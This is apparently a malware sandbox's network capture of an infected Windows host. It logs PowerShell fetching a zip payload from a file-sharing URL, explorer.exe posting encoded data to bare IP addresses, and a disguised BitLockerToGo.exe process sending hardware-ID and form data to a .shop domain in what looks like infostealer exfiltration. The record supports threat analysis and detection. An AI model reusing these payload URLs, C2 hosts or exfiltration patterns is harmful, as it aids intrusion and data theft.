2024-07-27 05:30:40 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:30:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=56iflqfr78guksgbtll7if5c2v; expires=Tue, 19-Nov-2024 23:17:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FC7r2QRKijid6B1RUePqyW6bVEpj68RqHrAiIiCb2bRSo3ISKUC2U7tdqn8oJFhbrLErh5sTZJt%2B3ndVr%2FPhEJRWZE1OYe55j60mX0gf1pQ2n62u1MsT3CWI5dFWPXKFxGF0apUfg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a3d1e8a6b4319-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:30:40 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 05:30:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	51842	31.14.70.245	443	2136	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:40 UTC	220	OUT	GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: store4.gofile.io Connection: Keep-Alive
2024-07-27 05:30:41 UTC	577	IN	HTTP/1.1 200 OK Server: nginx/1.27.0 Date: Sat, 27 Jul 2024 05:30:41 GMT Content-Type: application/zip Content-Length: 296998 Connection: close Accept-Ranges: bytes Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range Content-Disposition: attachment; filename*=UTF-8''vm.zip Last-Modified: Sat, 20 Jul 2024 15:35:59 GMT
2024-07-27 05:30:41 UTC	512	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 dd 74 ee 58 cf a1 af e2 8a 9e 01 00 ff 9f 01 00 08 00 00 00 64 61 74 61 2e 62 69 6e 00 1e 2c e1 d3 60 9c e8 00 00 00 00 5a b9 e0 9f 01 00 b0 01 30 84 0a 17 00 00 00 02 84 0a 17 00 00 00 e2 f0 81 c7 c8 60 d4 c8 e0 38 d3 0d 6b a8 40 7e 43 42 42 78 45 44 b8 8e c4 f4 26 64 49 c2 fa 90 bd c3 8e 2c 04 65 ca 0c c3 44 33 63 e6 cd 00 1b 15 f2 75 2e 36 08 0d 0d 0d 0d 09 fb e8 2c e7 02 e7 51 1d a5 d6 20 04 61 48 5d 3f 41 9f fb e3 78 8c 57 37 d8 63 1c 04 3b ac 66 fe 55 cd 04 c3 1d cc a6 43 93 5a 4b 8b 57 0a ee dd 76 c6 f0 c4 6f 0b a9 0d b8 52 ab f3 f7 de 75 2d 32 fd d6 ea f7 c9 c6 8c af bf 8a 23 db f4 53 5f 0a f2 0a ef 6d 13 d4 b1 3f 0c f6 df 34 16 d5 4b e0 f1 1b 76 cd 49 6c 55 65 c4 f8 b1 01 f5 86 86 ce fc 44 83 fe 80 f7 d7 52 e7 bf 20 Data Ascii: PKtXdata.bin,`Z0`8k@~CBBxED&dI,eD3cu.6,Q aH]?AxW7c;fUCZKWvoRu-2#S_m?4KvIlUeDR
2024-07-27 05:30:41 UTC	4096	IN	Data Raw: 33 95 ce 64 b8 6e 4a 63 20 5a 89 ec 08 66 8d 4f d6 f5 94 60 1f 4a 69 7a 91 77 33 98 ce e1 73 f5 64 f9 52 17 f4 ec 11 ff 0d 2b 1b b7 5c 82 b9 83 4d 06 af b5 93 16 93 73 06 4a da 21 57 0e d0 d4 9e e4 fa f7 cb 46 51 28 9c f3 f6 26 d0 6a 7c aa d9 31 b5 3b ff 7d cb 79 6f d4 dd eb ed e7 31 d7 1e 41 6c 9c 8b fc 7f 85 a4 04 36 5d 41 e6 6e 44 2e 2d 14 7e ad 9c 70 7a 7e e5 31 7f c5 00 67 b5 90 1a ea ea ea ea ea ea ea ea e8 e9 e9 e9 e5 e6 e6 e6 e6 e6 e6 e6 e0 13 44 2f 56 22 5c 4e 1d e3 63 a0 71 d0 96 6e 78 69 bc ae ef 38 6c da c7 37 97 5e e2 c0 d1 91 6c de 28 53 5e fb b0 9c 48 d1 02 aa f8 a5 f3 52 1e c6 a3 90 9d ea bc ea 56 12 20 18 75 cb 1f 54 c6 e9 c3 dc eb 37 3b 32 ca d2 da 51 95 29 35 28 8e 30 e1 f1 c9 21 dc f4 12 04 2f f9 89 ad 07 e3 87 16 7a 85 5d d5 e8 2c 01 Data Ascii: 3dnJc ZfO`Jizw3sdR+\MsJ!WFQ(&j\|1;}yo1Al6]AnD.-~pz~1gD/V"\Ncqnxi8l7^l(S^HRV uT7;2Q)5(0!/z],
2024-07-27 05:30:41 UTC	4096	IN	Data Raw: 33 7a bc 50 22 52 fe a2 f8 c4 39 89 3f 2e b3 06 08 22 29 03 16 ca 97 fa fc ec cb 51 ad b4 e3 59 e8 e8 bd cc 9c a4 44 21 29 8f 90 c0 20 2c b5 46 f5 45 56 76 bd 24 35 12 10 a7 35 d7 08 20 36 69 79 3a 22 a3 79 ff 42 41 6f db 85 d3 ef 9b 60 55 f9 54 8a c2 72 9b 7d 54 31 eb dc dd 48 dc c5 49 8c 2c a0 65 61 e7 62 0d 64 c0 f9 be 99 1a 67 5d ea 32 e5 3d cf 89 03 e0 09 db 8e af d9 26 6e b6 8a ae df 68 1a be 7c 10 e4 5c 57 87 1e 20 02 ed 21 8c 01 fd f5 e3 93 62 56 48 53 d7 19 37 00 9f 42 f1 58 a5 c2 b5 61 3a f9 d7 fb f8 81 4c 18 8a ca 16 4d e5 59 cf 2f e4 0c a5 df 09 13 fc 1b d0 33 b0 a1 12 db fd 3c 03 81 b3 76 41 58 ff 5e 80 17 f4 3c 43 4e 55 da 72 3b 68 6c e6 a0 58 55 c7 6a c2 2b 97 6b 53 bf 9d 7c e8 61 47 e2 ed 07 35 e2 05 c1 5d e7 ae 3b a5 4d fd a7 3f 25 5d 9f Data Ascii: 3zP"R9?.")QYD!) ,FEVv$55 6iy:"yBAo`UTr}T1HI,eabdg]2=&nh\|\W !bVHS7BXa:LMY/3<vAX^<CNUr;hlXUj+kS\|aG5];M?%]
2024-07-27 05:30:41 UTC	4096	IN	Data Raw: 3d cd 6c 50 05 c1 90 f9 06 f1 67 cd c8 d2 23 5d 14 fe ee d9 c2 b5 3e 6e 71 71 cc f5 88 08 47 5b 04 c1 44 5c 8f 0b 5a 1f 96 70 7e fb 05 aa b8 f1 4c 3a 6f 3c e8 a1 d6 f5 91 60 4d 31 3c b9 44 32 47 5d 53 a4 d9 a8 2f a8 28 b5 e3 d2 c1 85 41 89 e0 3b 13 57 8f c5 4c 00 af 1d c0 97 54 25 95 13 2c 2f 72 31 b7 ef f4 4b 14 c3 03 7d ea 68 b1 62 c5 af 3f 21 19 5a d2 25 78 8f 6e 38 4d 89 27 13 3b 77 40 0a b7 47 1e 2c 80 7d 26 63 cb 15 8e 56 7c 85 40 80 57 d6 38 d9 bd 43 c8 72 f6 55 4b bf 28 3d d1 51 9f c2 e4 b3 20 48 f8 19 c7 60 04 c6 3f 2c 0a cf 2f 84 47 3a 0e 81 c7 80 3e 8c 55 4a a5 79 af 21 b1 08 fd 56 55 13 f2 ac 96 e3 5c dd 6b b0 c6 26 c4 12 77 5d 8b 5b 23 2d 97 ac b5 9a a1 e6 63 44 d1 6f 92 dc 97 06 a7 4e b4 97 55 dc be 7a 6a 16 6b c8 45 30 c2 40 7b 66 f3 cf 3a Data Ascii: =lPg#]>nqqG[D\Zp~L:o<`M1<D2G]S/(A;WLT%,/r1K}hb?!Z%xn8M';w@G,}&cV\|@W8CrUK(=Q H`?,/G:>UJy!VU\k&w][#-cDoNUzjkE0@{f:
2024-07-27 05:30:41 UTC	4096	IN	Data Raw: 42 2f 38 dc 0f 26 2c e6 f7 ba 11 2e 00 f4 ca 5b de 37 06 33 99 8c 4f e9 32 9f 90 d8 f5 9b 8f c6 83 53 f0 f0 07 ff dd 71 a4 f2 63 ee ff 47 34 ad 89 c3 31 65 8f b4 fc dc 75 39 15 dc 3b 4a d9 aa 2f 79 ba ae 05 7a a2 c6 e9 a5 36 5c aa eb bf a3 22 42 59 64 a1 f1 c6 a9 43 41 b5 fc e9 75 85 c5 17 0c 95 26 59 3a 58 e6 49 1b 14 81 5f 74 e7 23 30 f6 7e f6 b4 dc f0 4c 8f 9f af ce bb 39 7d b8 0c 38 2c 3c 85 bf 73 89 15 05 d9 c7 ba 9c b0 b6 c7 06 26 f2 55 21 d3 e8 dd 23 fb 58 ab 31 f7 f1 2f 08 0b 84 52 0e 65 c5 d4 d5 cc 85 5c 7e 25 39 2b 97 b0 fd 15 5c a6 a6 29 65 e0 4c 80 4c 7c b6 a0 29 66 e5 a4 b5 7d 8f de f3 1c 55 68 d7 4b b2 1c 15 f8 6b 16 f3 6b 56 5b 29 d5 af 2c 62 11 75 4f 88 28 1d 01 5c 72 b1 4c fa 88 2c 6d 10 31 fe a6 e3 c9 fd f3 8a fd 1e e3 f2 9d 57 07 4c 53 Data Ascii: B/8&,.[73O2SqcG41eu9;J/yz6\"BYdCAu&Y:XI_t#0~L9}8,<s&U!#X1/Re\~%9+\)eLL\|)f}UhKkkV[),buO(\rL,m1WLS
2024-07-27 05:30:41 UTC	4096	IN	Data Raw: 0e 76 6b de 75 6e 21 70 29 8a 7a 31 f3 42 32 b6 49 e1 39 ac f9 c0 3f 5e 6b cf ce a1 c4 13 20 f4 96 f6 90 a8 7d ff 0f 2d e4 fd 74 e3 28 c4 d3 a4 83 f0 30 bd 5e 35 61 bd 64 6c 4a 98 8e 03 e9 e7 05 96 6f b4 12 12 89 9e 7b 1b 40 b5 7e 9b ee 82 1d ea ac cb eb 85 06 c0 2f cc 86 33 8e d7 97 b4 c6 82 20 54 76 54 8c af 89 09 69 bb 91 a2 ee 7c f8 e1 b4 32 0d 4c 5a 4f 74 f8 c3 10 ce 72 b4 cc f9 9d f6 57 9e 05 fe fc 21 9e 9c b7 9d 80 ac 8e 23 84 cc 0f be ac aa 0c bd 22 9a 24 ed 55 b5 b2 b2 7e ab b7 2e ab 93 60 d4 2c 1d 4b 67 0d 6d 0a c8 7e 7b 84 69 80 46 10 a4 e3 28 d1 3c 8b 77 14 8d b8 f4 c1 73 73 b8 b4 c6 77 e8 3d f2 b0 95 48 48 18 24 3c 8c 2f 5c 85 6c 71 e0 1a 52 82 c2 f7 04 c8 16 03 77 bd ea 37 7a 0e e1 1e 83 63 e5 ab e4 1d 2f 56 22 a4 ab 71 eb f7 7f 71 ab f2 79 Data Ascii: vkun!p)z1B2I9?^k }-t(0^5adlJo{@~/3 TvTi\|2LZOtrW!#"$U~.`,Kgm~{iF(<wssw=HH$</\lqRw7zc/V"qqy
2024-07-27 05:30:41 UTC	4096	IN	Data Raw: 61 44 99 ae d9 5f 85 61 f5 9a ae b4 27 63 28 9a e3 83 1c 5c 93 9e d9 a4 e0 ef 8b 92 20 f7 c5 6c b4 66 b5 3f dc b1 f4 f6 c4 46 c0 4d 59 9a 4c 9e 82 0a 05 f6 a8 b8 bb 46 f5 76 6b 3c 91 55 e6 c1 d1 aa 30 5b 35 05 ea b8 78 9d 48 d7 e3 2c 79 14 3e ad fa 94 8c a5 14 d8 23 52 d5 0d ee 34 f9 47 53 f7 63 6c 45 ae 5c 72 45 7b b9 64 83 ed 54 74 62 f3 54 87 71 3a a0 ba 5d 1e 9a 44 84 25 4c 29 11 85 62 28 86 c4 62 4d d5 3c f8 fa 12 75 d4 2c 7b 53 fb 08 b5 05 34 23 b3 36 45 35 e0 e7 67 5c 50 97 3f 4e 81 85 63 a9 22 b9 9c 03 6d 9a 53 9f 5d d7 2f e3 ef 69 7b ac de ac 89 67 c3 68 45 93 32 f9 61 e3 34 0b 87 95 47 00 ef c4 cc d6 ef ff 91 99 d2 25 27 05 96 11 b1 3d b9 88 c9 24 24 33 ed 57 59 5f e1 47 43 dc 39 fe 91 57 63 33 5e 48 e4 11 0a 02 d4 72 f4 ed da f1 25 78 7f d6 4a Data Ascii: aD_a'c(\ lf?FMYLFvk<U0[5xH,y>#R4GSclE\rE{dTtbTq:]D%L)b(bM<u,{S4#6E5g\P?Nc"mS]/i{ghE2a4G%'=$$3WY_GC9Wc3^Hr%xJ
2024-07-27 05:30:41 UTC	4096	IN	Data Raw: c6 9a 08 b4 f1 1f fe 00 fd 46 f6 8d 91 d7 25 3e 0d bb b8 2a 21 34 7f 26 7b d8 57 ea 8b f7 d4 dd 58 da 17 30 a7 07 70 66 05 33 de c5 86 42 1b c6 45 a9 3c dc dc 0b 07 c5 ad 5a a4 4c 86 2d 04 ba 90 3f fb 2c cd 71 25 2a 95 61 01 3b 85 d4 e5 9b 47 da 17 5a 13 71 e8 f5 ea f7 ef 53 e7 36 e6 cf d0 c9 1e 25 b7 79 66 93 a9 64 94 bc df 87 83 c0 4d 92 09 63 4e cc 7c c6 6c d1 78 1f 7c 2a be ad c7 bc 69 39 a7 c3 00 4a aa 0e 27 c1 0e 13 ec 8c bd 32 07 a0 0c b3 0b 16 f0 ff 57 42 e1 26 ec 71 b4 af 88 d3 13 0a 08 9f 0f 17 be d1 71 ef 82 06 8b 4d 52 1a 86 06 d6 b9 1f ae 05 4b 6d ca 31 67 fc 97 75 29 2a 72 bc 54 11 2c a8 ce 94 05 dc 54 a5 09 61 bc 9f e5 d1 7e fb 1a bd d3 eb 17 e9 e5 cc b9 c9 ce af 4f 84 ad da 97 12 2d 81 d4 5a 23 c4 15 9e ec 98 91 c6 16 eb 2d 6a e9 f5 4d 45 Data Ascii: F%>!4&{WX0pf3BE<ZL-?,q%a;GZqS6%yfdMcN\|lx\|i9J'2WB&qqMRKm1gu)rT,Ta~O-Z#-jME
2024-07-27 05:30:41 UTC	4096	IN	Data Raw: 3a b1 f5 56 a3 46 09 66 0f 7c 4c 68 ea 1d 72 9d 06 f0 dd e5 73 ca d9 33 bc 95 e7 29 85 46 2e 9d a1 a4 9c 63 57 56 c6 c6 f4 4e 05 86 44 ea 37 65 30 84 79 0e f7 c8 84 b4 71 bf a2 de b1 b6 10 87 06 07 3c c9 76 a3 0a 7b 4f b7 1c 1c 66 da 89 8a d3 9e 10 3b 35 97 b2 1e 18 99 80 6e 22 b5 7f 7e 41 4a 3b 98 1b ae 71 de 60 d0 9d aa a6 73 c8 99 ce 00 6b 4e e5 c9 cf c7 04 a1 f0 49 64 6f 8b 8b 4f 01 9c c4 f3 ce 4b 1d d5 26 87 81 88 3c bf f2 b6 b3 f7 97 ee b1 1b 4f 8a 74 24 1d 92 1f 39 7d 2e c0 0d 9c 17 b6 d9 71 34 3f e0 78 cf a5 0e 4a 3f 57 9a eb 75 57 48 2c e4 f1 d5 b9 69 f1 41 3c 32 ff 23 ed 60 09 21 98 5e b9 9e ba 67 95 00 9d 25 f9 62 1d 1d 2a 4e ce bb 74 52 27 97 11 39 71 ac df 04 ca 34 71 9e 44 70 1a 53 8e 78 5f 07 6b 28 8b f1 b4 f8 8a 93 e3 13 27 0f 8d f1 c6 a2 Data Ascii: :VFf\|Lhrs3)F.cWVND7e0yq<v{Of;5n"~AJ;q`skNIdoOK&<Ot$9}.q4?xJ?WuWH,iA<2#`!^g%b*NtR'9q4qDpSx_k('
2024-07-27 05:30:41 UTC	4096	IN	Data Raw: 34 02 0a 6c 1e bc a6 59 40 b8 41 3d 0e 24 4e 66 dc 6d 19 d4 b0 73 28 7c b0 e5 f2 82 51 cf 80 02 43 34 45 2a 9a 8c 3c 60 2f d1 7b 7f 0b 5f 2a 3e 10 b3 8a ab 82 8b e6 6a f1 a1 5e 1b b8 8f 71 db 09 d9 be 39 83 6f 1e 51 d4 3c 3f 80 8c 5d 7a 31 6e b3 89 67 c0 30 d7 df c0 f0 1e ed e0 92 d9 a7 09 0f b6 9c 47 81 a8 12 48 60 10 4f 14 0c d3 15 ca 54 23 e5 5d 6e c5 03 e5 10 9a f0 3e b4 02 26 e8 b9 01 a6 65 79 5b 7b 66 b2 5c 70 b9 16 d5 26 f9 e8 5e e9 ea 5f 00 b7 73 25 b9 f9 5b 5e 3e 82 1f 48 f2 6c 61 0b cf e4 cd d2 33 e4 c8 4c 19 05 b7 09 57 69 33 c0 b2 9a 94 93 2b dd 7c 16 b4 60 18 99 a7 c8 d2 de 5c c7 7e 8b 11 30 93 37 15 e0 02 01 c1 b1 78 df f0 1c 5a 35 e4 ab 35 1b 06 54 d1 af 73 88 df e2 29 cb b9 b3 48 0a ab 78 5d 2b 7d 88 a5 e6 28 f3 1d 1d f6 db 5c 10 cd f6 2c Data Ascii: 4lY@A=$Nfms(\|QC4E<`/{_>j^q9oQ<?]z1ng0GH`OT#]n>&ey[{f\p&^_s%[^>Hla3LWi3+\|`\~07xZ55Ts)Hx]+}(\,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	51843	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:41 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:30:41 UTC	1122	OUT	Data Raw: 46 49 45 61 5a 59 68 4e 6d 71 37 55 6e 75 39 49 30 2f 4d 68 63 6a 38 32 59 63 71 64 55 44 49 48 62 58 76 75 35 4d 33 38 6b 32 32 78 43 59 49 79 64 5a 4b 4d 69 75 65 56 49 43 59 32 52 38 4b 62 63 72 58 30 55 65 47 41 55 38 30 78 6b 6d 34 75 6e 55 66 31 66 32 70 4a 58 34 59 67 4a 77 33 4e 75 30 44 4f 52 4d 37 75 68 33 68 49 79 68 37 2b 62 36 37 6d 31 71 2b 6c 38 2f 67 6c 43 69 4c 38 63 77 43 59 45 6b 6a 4e 76 47 6e 70 4a 66 72 55 35 41 53 57 48 58 38 62 65 4e 77 67 41 56 62 63 4a 43 66 2b 37 6a 4a 5a 6a 63 50 37 46 57 46 45 52 44 54 42 54 42 66 46 4a 6b 68 32 45 5a 75 54 77 71 68 62 55 56 47 30 42 36 4d 76 58 50 6f 73 57 4a 70 57 68 49 31 38 43 6f 4d 2f 45 65 55 41 61 48 46 44 48 36 79 2f 47 6d 31 43 61 54 76 44 58 77 6d 33 56 73 42 61 75 7a 41 75 47 50 38 Data Ascii: FIEaZYhNmq7Unu9I0/Mhcj82YcqdUDIHbXvu5M38k22xCYIydZKMiueVICY2R8KbcrX0UeGAU80xkm4unUf1f2pJX4YgJw3Nu0DORM7uh3hIyh7+b67m1q+l8/glCiL8cwCYEkjNvGnpJfrU5ASWHX8beNwgAVbcJCf+7jJZjcP7FWFERDTBTBfFJkh2EZuTwqhbUVG0B6MvXPosWJpWhI18CoM/EeUAaHFDH6y/Gm1CaTvDXwm3VsBauzAuGP8
2024-07-27 05:30:42 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:42 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:42 UTC	685	IN	Data Raw: 61 30 6e 4f 74 64 79 7a 6d 53 39 32 4a 51 77 77 51 51 72 30 58 4d 42 33 51 33 62 75 4c 52 77 58 6b 36 45 45 78 57 47 69 52 79 54 4d 73 79 33 4d 5a 44 6e 54 58 6c 4b 72 58 35 63 44 38 72 2f 6b 48 36 79 72 30 41 57 6a 50 35 62 69 54 37 59 33 7a 53 4c 2f 2f 46 64 61 6d 4d 75 31 34 38 39 2f 77 6f 2b 4f 74 35 45 42 63 46 69 78 75 74 39 56 35 39 62 55 33 79 6e 39 2f 43 48 32 56 71 63 69 32 77 52 38 30 56 5a 44 6c 53 52 4a 59 57 75 65 66 31 46 72 54 71 6e 4a 71 73 41 2f 36 49 38 6f 58 45 39 6e 53 71 42 6a 7a 41 55 7a 46 45 42 49 52 47 2b 68 59 38 4d 6b 68 55 7a 6a 74 49 51 70 48 6b 59 6a 34 37 73 4e 74 4d 4b 51 45 41 70 32 52 2b 6c 33 69 39 4a 4b 32 46 73 36 52 33 75 6b 6d 66 2f 32 6d 38 56 6a 71 4b 66 78 52 41 66 44 51 36 73 4d 30 41 68 56 68 6c 61 74 2f 6a 75 Data Ascii: a0nOtdyzmS92JQwwQQr0XMB3Q3buLRwXk6EExWGiRyTMsy3MZDnTXlKrX5cD8r/kH6yr0AWjP5biT7Y3zSL//FdamMu1489/wo+Ot5EBcFixut9V59bU3yn9/CH2Vqci2wR80VZDlSRJYWuef1FrTqnJqsA/6I8oXE9nSqBjzAUzFEBIRG+hY8MkhUzjtIQpHkYj47sNtMKQEAp2R+l3i9JK2Fs6R3ukmf/2m8VjqKfxRAfDQ6sM0AhVhlat/ju

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	51844	188.114.96.3	443	320	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:41 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20562 Host: callosallsaospz.shop
2024-07-27 05:30:41 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 35 45 31 44 37 39 30 37 41 38 31 33 42 30 43 32 44 30 35 38 38 33 30 39 43 31 36 44 36 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A25E1D7907A813B0C2D0588309C16D62--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-27 05:30:41 UTC	5231	OUT	Data Raw: 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 Data Ascii: vMMZh'F3Wun 4F([:7s~X`nO`
2024-07-27 05:30:41 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:30:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o4udg94e7erdh5b3neabahg697; expires=Tue, 19-Nov-2024 23:17:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kH0mduUJJ09C0vrnhc2lDQBF907KRfxStX%2BJJX6Qc5fBHuVcdlBtqEh3wd18rq89vhA8nuMtjQje7lf1SNSWqyokAFHCMploNYXjbZ%2FwNgwuCoFH0g2xNABaaws%2F1ASVtRys3cHqnw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a3d280b4c41e1-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:30:41 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 05:30:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	51845	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:43 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:30:43 UTC	1267	OUT	Data Raw: 61 61 58 69 42 46 6e 61 43 62 71 59 73 77 68 36 52 54 69 75 35 69 47 6c 38 4f 33 38 4f 46 6c 4d 4c 2b 7a 6f 47 56 4f 59 63 79 58 6d 52 46 6c 56 78 7a 42 6b 51 6d 4d 32 50 76 50 32 5a 4a 79 46 38 72 56 50 69 79 38 55 30 53 68 61 4f 6a 34 32 70 39 34 77 39 37 51 64 41 73 42 7a 64 67 38 61 31 66 6b 59 59 33 36 75 65 78 57 49 34 65 6f 4e 7a 35 46 4c 6b 5a 35 34 52 57 72 35 78 6d 30 41 33 6c 54 6a 75 78 6a 53 50 72 4e 42 6d 44 61 63 6d 6a 76 49 67 55 51 37 49 57 49 66 4a 77 73 4e 72 4d 77 69 66 6c 75 61 79 63 50 56 45 45 6e 4a 48 52 34 42 33 7a 53 35 61 61 71 71 4c 30 76 6b 48 6f 75 5a 63 6e 4f 33 36 77 6f 67 79 65 68 68 6c 75 48 48 7a 41 52 72 69 65 54 73 77 33 65 62 35 63 69 4e 57 50 76 35 57 4f 54 43 77 4e 70 59 55 76 2b 6d 2b 53 38 50 6d 52 61 4e 59 79 63 Data Ascii: aaXiBFnaCbqYswh6RTiu5iGl8O38OFlML+zoGVOYcyXmRFlVxzBkQmM2PvP2ZJyF8rVPiy8U0ShaOj42p94w97QdAsBzdg8a1fkYY36uexWI4eoNz5FLkZ54RWr5xm0A3lTjuxjSPrNBmDacmjvIgUQ7IWIfJwsNrMwifluaycPVEEnJHR4B3zS5aaqqL0vkHouZcnO36wogyehhluHHzARrieTsw3eb5ciNWPv5WOTCwNpYUv+m+S8PmRaNYyc
2024-07-27 05:30:44 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:44 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:44 UTC	685	IN	Data Raw: 50 39 34 62 5a 51 37 71 37 31 49 7a 48 71 6e 75 70 53 74 73 6e 7a 37 62 4a 78 73 41 38 61 6f 53 62 59 53 4a 54 4a 41 62 79 39 76 4d 4a 59 55 32 56 4b 51 4c 32 63 67 51 65 50 6f 50 58 63 4c 78 6b 64 34 49 54 64 4a 72 42 47 53 35 46 71 76 66 2f 38 4b 6a 6f 76 59 46 6f 75 72 78 63 64 58 7a 68 61 73 6d 31 62 38 38 77 6a 30 53 6b 52 56 57 53 32 51 67 50 73 68 4a 47 30 6a 58 31 4c 4c 79 31 31 37 52 4b 46 42 49 47 6e 77 36 6f 78 63 78 54 59 30 39 63 54 6d 4c 63 71 46 37 77 6f 6d 41 69 63 4f 30 7a 31 6d 69 73 4f 44 63 65 50 32 35 79 6f 4e 76 77 66 6e 52 77 69 46 53 76 50 59 46 76 6c 63 67 32 45 4c 70 45 54 77 2b 36 42 73 71 58 77 4d 4c 55 71 70 4b 48 32 75 75 42 63 6a 52 66 4a 46 4f 79 6c 31 35 6a 45 30 62 79 52 30 52 59 63 50 49 50 34 41 65 32 2f 69 70 43 34 74 Data Ascii: 